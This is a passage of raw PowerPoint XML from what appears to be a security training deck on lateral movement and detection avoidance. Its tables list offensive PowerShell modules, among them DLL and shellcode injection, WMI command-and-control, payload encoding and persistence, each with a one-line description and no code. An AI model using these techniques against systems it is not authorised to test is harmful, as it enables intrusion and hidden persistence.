                <a:tableStyleId>{5C22544A-7EE6-4342-B048-85BDC9FD1C3A}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="2340428">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="1414830880"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="6495123">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="1314350341"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="299357">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="1300" noProof="0" dirty="0">
                          <a:latin typeface="Arial"/>
                        </a:rPr>
                        <a:t>Module/Script</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="1300" noProof="0" dirty="0">
                          <a:latin typeface="Arial"/>
                        </a:rPr>
                        <a:t>Description</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="3138939995"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="299357">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr lvl="0">
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1300" b="1" i="0" u="none" strike="noStrike" noProof="0" dirty="0">
                          <a:latin typeface="Arial"/>
                        </a:rPr>
                        <a:t>Invoke-</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1300" b="1" i="0" u="none" strike="noStrike" noProof="0" err="1">
                          <a:latin typeface="Arial"/>
                        </a:rPr>
                        <a:t>Dllinjection</a:t>
                      </a:r>
                      <a:endParaRPr lang="pt-BR" sz="1300" b="1">
                        <a:latin typeface="Arial"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr lvl="0">
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1300" b="0" i="0" u="none" strike="noStrike" noProof="0" dirty="0">
                          <a:latin typeface="Arial"/>
                        </a:rPr>
                        <a:t>Injects a DLL into the process ID of your choosing</a:t>
                      </a:r>
                      <a:endParaRPr lang="pt-BR" sz="1300">
                        <a:latin typeface="Arial"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="3889016744"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="370840">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr lvl="0">
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1300" b="1" i="0" u="none" strike="noStrike" noProof="0" dirty="0">
                          <a:latin typeface="Arial"/>
                        </a:rPr>
                        <a:t>Invoke-</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1300" b="1" i="0" u="none" strike="noStrike" noProof="0" err="1">
                          <a:latin typeface="Arial"/>
                        </a:rPr>
                        <a:t>ReflectivePE</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1300" b="1" i="0" u="none" strike="noStrike" noProof="0" dirty="0">
                          <a:latin typeface="Arial"/>
                        </a:rPr>
                        <a:t> Injection</a:t>
                      </a:r>
                      <a:endParaRPr lang="pt-BR" sz="1300" b="1">
                        <a:latin typeface="Arial"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr lvl="0" algn="l">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1300" b="0" i="0" u="none" strike="noStrike" noProof="0" dirty="0">
                          <a:latin typeface="Arial"/>
                        </a:rPr>
                        <a:t>Reflectively loads a Windows PE file (DLL/EXE) into the PowerShell process or reflectively injects a DLL into a remote process</a:t>
                      </a:r>
                      <a:endParaRPr lang="pt-BR" sz="1300">
                        <a:latin typeface="Arial"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="3868594995"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="299357">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr lvl="0">
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1300" b="1" i="0" u="none" strike="noStrike" noProof="0" dirty="0">
                          <a:latin typeface="Arial"/>
                        </a:rPr>
                        <a:t>Invoke-Shellcode</a:t>
                      </a:r>
                      <a:endParaRPr lang="pt-BR" sz="1300" b="1">
                        <a:latin typeface="Arial"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr lvl="0">
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1300" b="0" i="0" u="none" strike="noStrike" noProof="0" dirty="0">
                          <a:latin typeface="Arial"/>
                        </a:rPr>
                        <a:t>Injects shellcode into the process ID of your choosing or within PowerShell locally</a:t>
                      </a:r>
                      <a:endParaRPr lang="pt-BR" sz="1300">
                        <a:latin typeface="Arial"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="3816093248"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="503464">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr lvl="0">
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1300" b="1" i="0" u="none" strike="noStrike" noProof="0" dirty="0">
                          <a:latin typeface="Arial"/>
                        </a:rPr>
                        <a:t>Invoke-</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1300" b="1" i="0" u="none" strike="noStrike" noProof="0" err="1">
                          <a:latin typeface="Arial"/>
                        </a:rPr>
                        <a:t>WmiCommand</a:t>
                      </a:r>
                      <a:endParaRPr lang="pt-BR" sz="1300" b="1">
                        <a:latin typeface="Arial"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr lvl="0">
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1300" b="0" i="0" u="none" strike="noStrike" noProof="0" dirty="0">
                          <a:latin typeface="Arial"/>
                        </a:rPr>
                        <a:t>Executes a PowerShell </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1300" b="0" i="0" u="none" strike="noStrike" noProof="0" err="1">
                          <a:latin typeface="Arial"/>
                        </a:rPr>
                        <a:t>ScriptBlock</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1300" b="0" i="0" u="none" strike="noStrike" noProof="0" dirty="0">
                          <a:latin typeface="Arial"/>
                        </a:rPr>
                        <a:t> on a target computer and returns its formatted output using WMI as a C2 channel</a:t>
                      </a:r>
                      <a:endParaRPr lang="pt-BR" sz="1300">
                        <a:latin typeface="Arial"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="3433902618"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="370840">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr lvl="0" algn="l">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1300" b="1" i="0" u="none" strike="noStrike" noProof="0" dirty="0">
                          <a:latin typeface="Arial"/>
                        </a:rPr>
                        <a:t>Out-EncodedCommand    </a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1300" b="1">
                        <a:latin typeface="Arial"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr lvl="0" algn="l">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1300" b="0" i="0" u="none" strike="noStrike" noProof="0" dirty="0">
                          <a:latin typeface="Arial"/>
                        </a:rPr>
                        <a:t>Compresses, Base64 encodes, and generates command-line output for a PowerShell payload script</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1300" b="0" i="0" u="none" strike="noStrike" noProof="0">
                        <a:solidFill>
                          <a:srgbClr val="000000"/>
                        </a:solidFill>
                        <a:latin typeface="Arial"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="3909239564"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="370840">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr lvl="0" algn="l">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1300" b="1" i="0" u="none" strike="noStrike" noProof="0" dirty="0">
                          <a:latin typeface="Arial"/>
                        </a:rPr>
                        <a:t>Out-</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1300" b="1" i="0" u="none" strike="noStrike" noProof="0" dirty="0" err="1">
                          <a:latin typeface="Arial"/>
                        </a:rPr>
                        <a:t>CompressedDll</a:t>
                      </a:r>
                      <a:endParaRPr lang="pt-BR" sz="1300" b="1" dirty="0" err="1">
                        <a:latin typeface="Arial"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr lvl="0">
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1300" b="0" i="0" u="none" strike="noStrike" kern="1200" noProof="0" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                          <a:latin typeface="Arial"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>Compresses, Base64 encodes, and outputs generated code to load a managed DLL in memory</a:t>
                      </a:r>
                      <a:endParaRPr lang="pt-BR" sz="1300" b="0" i="0" u="none" strike="noStrike" kern="1200" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="dk1"/>
                        </a:solidFill>
                        <a:latin typeface="Arial"/>
                        <a:ea typeface="+mn-ea"/>
                        <a:cs typeface="+mn-cs"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="1147115551"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="299357">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr lvl="0" algn="l">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1300" b="1" i="0" u="none" strike="noStrike" kern="1200" noProof="0" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                          <a:latin typeface="Arial"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>Out-</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1300" b="1" i="0" u="none" strike="noStrike" kern="1200" noProof="0" dirty="0" err="1">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                          <a:latin typeface="Arial"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>EncryptedScript</a:t>
                      </a:r>
                      <a:endParaRPr lang="pt-BR" sz="1300" b="1" i="0" u="none" strike="noStrike" kern="1200" dirty="0" err="1">
                        <a:solidFill>
                          <a:schemeClr val="dk1"/>
                        </a:solidFill>
                        <a:latin typeface="Arial"/>
                        <a:ea typeface="+mn-ea"/>
                        <a:cs typeface="+mn-cs"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr lvl="0">
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1300" b="0" i="0" u="none" strike="noStrike" kern="1200" noProof="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Arial"/>
                        </a:rPr>
                        <a:t>Encrypts text files/scripts</a:t>
                      </a:r>
                      <a:endParaRPr lang="pt-BR" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="2595013429"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="312964">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr lvl="0">
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1300" b="1" i="0" u="none" strike="noStrike" noProof="0" dirty="0">
                          <a:latin typeface="Arial"/>
                        </a:rPr>
                        <a:t>Remove-Comments</a:t>
                      </a:r>
                      <a:endParaRPr lang="pt-BR" sz="1300" b="1">
                        <a:latin typeface="Arial"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr lvl="0" algn="l">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1300" b="0" i="0" u="none" strike="noStrike" noProof="0" dirty="0">
                          <a:latin typeface="Arial"/>
                        </a:rPr>
                        <a:t>Strips comments and extra whitespace from a script</a:t>
                      </a:r>
                      <a:endParaRPr lang="pt-BR" sz="1300" dirty="0">
                        <a:latin typeface="Arial"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="1734481702"/>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dirty="0"/>
              <a:t>40</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="40188255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Understanding How to Perform Lateral Movement, Detection Avoidance, and Enumeration</a:t>
            </a:r>
            <a:endParaRPr lang="pt-BR"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Text 0"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="100" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="274320"/>
            <a:ext cx="9144000" cy="386033"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0" anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Legitimate Utilities and Living-off-the-Land (Cont.)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Text 2"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="925183"/>
            <a:ext cx="8786001" cy="2280608"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0" anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1400">
              <a:solidFill>
                <a:srgbClr val="181A1F"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:cs typeface="Calibri" panose="020F0502020204030204"/>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dirty="0"/>
              <a:t>41</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="7" name="Tabela 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DD3392BF-586B-1BAC-FBDC-29EF951C7768}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1148579017"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="118613" y="938122"/>
          <a:ext cx="8917195" cy="4032794"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr firstRow="1" bandRow="1">
                <a:tableStyleId>{5C22544A-7EE6-4342-B048-85BDC9FD1C3A}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="2775857">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="1414830880"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="6141338">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="1314350341"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="299357">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="1300" noProof="0" dirty="0">
                          <a:latin typeface="Arial"/>
                        </a:rPr>
                        <a:t>Module/Script</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="1300" noProof="0" dirty="0">
                          <a:latin typeface="Arial"/>
                        </a:rPr>
                        <a:t>Description</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="3138939995"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="370840">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr lvl="0">
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1300" b="1" i="0" u="none" strike="noStrike" noProof="0" dirty="0">
                          <a:latin typeface="Arial"/>
                        </a:rPr>
                        <a:t>New-</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1300" b="1" i="0" u="none" strike="noStrike" noProof="0" dirty="0" err="1">
                          <a:latin typeface="Arial"/>
                        </a:rPr>
                        <a:t>UserPersistence</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1300" b="1" i="0" u="none" strike="noStrike" noProof="0" dirty="0">
                          <a:latin typeface="Arial"/>
                        </a:rPr>
                        <a:t> Option</a:t>
                      </a:r>
                      <a:endParaRPr lang="pt-BR" b="1">
                        <a:latin typeface="Arial"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr lvl="0">
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1300" b="0" i="0" u="none" strike="noStrike" noProof="0" dirty="0">
                          <a:latin typeface="Arial"/>
                        </a:rPr>
                        <a:t>Configures user-level persistence options for the Add-Persistence function</a:t>
                      </a:r>
                      <a:endParaRPr lang="pt-BR">
                        <a:latin typeface="Arial"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="3889016744"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="370840">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr lvl="0">
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1300" b="1" i="0" u="none" strike="noStrike" noProof="0" dirty="0">
                          <a:latin typeface="Arial"/>
                        </a:rPr>
                        <a:t>New-</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1300" b="1" i="0" u="none" strike="noStrike" noProof="0" dirty="0" err="1">
                          <a:latin typeface="Arial"/>
                        </a:rPr>
                        <a:t>ElevatedPersistence</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1300" b="1" i="0" u="none" strike="noStrike" noProof="0" dirty="0">
                          <a:latin typeface="Arial"/>
                        </a:rPr>
                        <a:t> Option</a:t>
                      </a:r>
                      <a:endParaRPr lang="pt-BR" b="1">
                        <a:latin typeface="Arial"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr lvl="0" algn="l">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1300" b="0" i="0" u="none" strike="noStrike" noProof="0" dirty="0">
                          <a:latin typeface="Arial"/>
                        </a:rPr>
                        <a:t>Configures elevated persistence options for the Add-Persistence function</a:t>
                      </a:r>
                      <a:endParaRPr lang="pt-BR">
                        <a:latin typeface="Arial"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="3868594995"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="370840">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr lvl="0">
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1300" b="1" i="0" u="none" strike="noStrike" noProof="0" dirty="0">
                          <a:latin typeface="Arial"/>
                        </a:rPr>
                        <a:t>Add-Persistence</a:t>
                      </a:r>
                      <a:endParaRPr lang="pt-BR" b="1">
                        <a:latin typeface="Arial"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr lvl="0">
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1300" b="0" i="0" u="none" strike="noStrike" noProof="0" dirty="0">
                          <a:latin typeface="Arial"/>
                        </a:rPr>
                        <a:t>Adds persistence capabilities to a script</a:t>
                      </a:r>
                      <a:endParaRPr lang="pt-BR">
                        <a:latin typeface="Arial"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="3816093248"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="299357">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
